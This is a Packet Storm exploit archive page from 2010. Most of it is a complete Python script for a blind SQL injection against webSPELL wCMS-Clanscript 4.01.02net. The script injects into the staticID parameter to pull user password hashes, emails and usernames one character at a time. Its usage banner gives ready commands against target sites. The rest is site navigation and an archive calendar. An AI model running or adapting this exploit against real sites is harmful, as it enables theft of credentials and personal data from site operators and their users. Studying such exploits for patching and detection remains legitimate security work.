what you don't know can hurt you

webSPELL wCMS-Clanscript 4.01.02net Blind SQL Injection

webSPELL wCMS-Clanscript 4.01.02net Blind SQL Injection
Posted Sep 29, 2010
Authored by Easy Laster

webSPELL wCMS-Clanscript version 4.01.02net remote blind SQL injection exploit.

tags | exploit, remote, sql injection
MD5 | 92e9ce3ba320c9d34ee26518adbc9bf3

webSPELL wCMS-Clanscript 4.01.02net Blind SQL Injection

Change Mirror Download
#----------------------------Information------------------------------------------------
#+Autor : Easy Laster
#+ICQ : 11-051-551
#+Date : 29.09.2010
#+Script : Webspell wCMS-Clanscript4.01.02net<= static&static Blind SQL Injection Exploit
#+Price : $00,00
#+Language :PHP
#+Discovered by Easy Laster
#+code by Dr.ChAoS
#+Security Group Undergroundagents,Free-hack and 4004-Security-Project
#+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
#Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
#N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
#and all member from free-hack.com.
#---------------------------------------------------------------------------------------
#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys, urllib2, getopt

def out(str):
sys.stdout.write(str)
sys.stdout.flush()

def read_url(url):
while True:
try:
src = urllib2.urlopen(url).read()
break
except:
pass
return src

class Exploit:
charset = "0123456789abcdefABCDEF"
url = ""
charn = 1
id = 1
table_prefix = "webs_"
table_field = ""
passwd = ""
columns = []
find_passwd = True

def __init__(self):
if len(sys.argv) < 2:
print "*****************************************************************************"
print "*Webspell wCMS-Clanscript4.01.02net static&static Blind SQL Injection Exploit*"
print "*****************************************************************************"
print "* Discovered and vulnerability by Easy Laster *"
print "* coded by Dr.ChAoS *"
print "*****************************************************************************"
print "* Usage: *"
print "* python exploit.py [OPTION...] [SWITCH...] <url> *"
print "* *"
print "* Example: *"
print "* *"
print "* Get the password of the user with id 2: *"
print "* python exploit.py --id 2 http://site.de/path/ *"
print "* *"
print "* Get email, username and password of id 1: *"
print "* python exploit.py --columns 80:1:email,25:5:username http://site.de/ *"
print "* *"
print "* Switches: *"
print "* --nopw Search no password *"
print "* *"
print "* Options: *"
print "* --id <user id> User id *"
print "* --prefix <table prefix> Table prefix of ECP *"
print "* --charn <1 - 32, default = 1> Start at position x *"
print "* --columns <max_chars:charn:column,...> Get value of any column you want *"
print "*****************************************************************************"
exit()
opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "charn=", "columns=", "nopw"])
for opt in opts:
if opt[0] == "--id":
self.id = int(opt[1])
elif opt[0] == "--prefix":
self.table_prefix = opt[1]
elif opt[0] == "--charn":
self.charn = int(opt[1])
elif opt[0] == "--columns":
for col in opt[1].split(","):
max, charx, name = col.split(":")
self.columns.append([int(max), int(charx), name, ""])
elif opt[0] == "--nopw":
self.find_passwd = False
for switch in switches:
if switch[:4] == "http":
if switch[-1:] == "/":
self.url = switch
else:
self.url = switch + "/"
def valid_page(self, src):
if "http://www.wookie.de/images/baustelle.gif" not in src:
return True
else:
return False
def generate_url(self, ascii):
return self.url + "index.php?site=static&staticID=1%27+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "user+WHERE+userid=" + str(self.id) + ")," + str(self.charn) + ",1))%3E" + str(ord(ascii)) + "--+"
def start(self):
print "Exploiting..."
if self.find_passwd:
charx = self.charn
self.password()
if len(self.columns) > 0:
self.read_columns()
print "All finished!\n"
print "------ Results ------"
if len(self.columns) > 0:
for v in self.columns:
print "Column \"" + v[2] + "\": " + v[3]
if self.find_passwd:
if len(self.passwd) == 32 - charx + 1:
print "Password: " + self.passwd
else:
print "Password not found!"
print "---------------------"
def read_columns(self):
end = False
charrange = [0]
charrange.extend(range(32, 256))
for i in range(len(self.columns)):
out("Getting value of \"" + self.columns[i][2] + "\": ")
self.table_field = self.columns[i][2]
self.charn = self.columns[i][1]
for pwc in range(self.charn, self.columns[i][0] + 1):
if end == True:
break
self.charn = pwc
end = False
for c in charrange:
src = read_url(self.generate_url(chr(c)))
if self.valid_page(src):
if c == 0:
end = True
else:
self.columns[i][3] += chr(c)
out(chr(c))
break
out("\n")
def password(self):
out("Getting password: ")
self.table_field = "password"
for pwc in range(self.charn, 33):
self.charn = pwc
for c in self.charset:
src = read_url(self.generate_url(c))
if self.valid_page(src):
self.passwd += c
out(c)
break
out("\n")

exploit = Exploit()
exploit.start()

Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close